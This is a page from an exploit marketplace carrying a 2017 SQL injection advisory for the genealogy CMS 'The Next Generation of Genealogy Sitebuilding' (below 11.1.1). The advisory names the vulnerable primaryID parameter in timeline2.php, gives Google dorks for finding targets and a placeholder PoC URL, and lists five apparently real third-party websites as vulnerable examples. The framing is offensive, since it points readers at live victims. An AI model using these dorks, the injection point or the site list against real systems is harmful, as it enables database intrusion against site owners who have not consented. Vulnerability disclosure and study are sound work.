0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
The Next Generation Of Genealogy Sitebuilding SQL Injection Vulnerability
[========================================================================================== The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability : # Date : 29th August 2017 : # Author : X-Cisadane : # CMS Name : The Next Generation of Genealogy Sitebuilding : # Version : < 11.1.1 : # CMS Developer : http://www.tngsitebuilding.com/ : # Category : Web Application : # Vulnerability : SQL Injection : # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit) : # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the The Next Generation of Genealogy Sitebuilding CMS. The vulnerability allows remote attackers to execute own SQL Commands by usage of a vulnerable serivce value. The vulnerability is located in the primaryID value of the timeline2.php file. Remote attackers are able to execute own SQL Commands by usage of a GET method request with manipulated primaryID value. Remote attackers are able to read database information by execution of own SQL Commands. DORKS (How to find the target) : ================================ inurl:/timeline2.php?primaryID= Or "powered by The Next Generation of Genealogy Sitebuilding" Or use your own Google Dorks :) Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/timeline2.php?primaryID=['SQLi] Screenshot (PoC) : https://s20.postimg.org/asdu29rwt/Screenshot_99.png https://s20.postimg.org/wsu6iwakt/Screenshot_100.png Example of Vuln Sites : http://1820settlers.co.uk/genealogy/timeline2.php?primaryID=['SQLi] http://lythgoes.net/genealogy/timeline2.php?primaryID=['SQLi] http://henrygrowfamily.org/timeline2.php?primaryID=['SQLi] http://www.ennever.com/timeline2.php?primaryID=['SQLi] http://mcbridehistory.com/timeline2.php?primaryID=['SQLi] ... etc ... # 0day.today [2024-11-16] #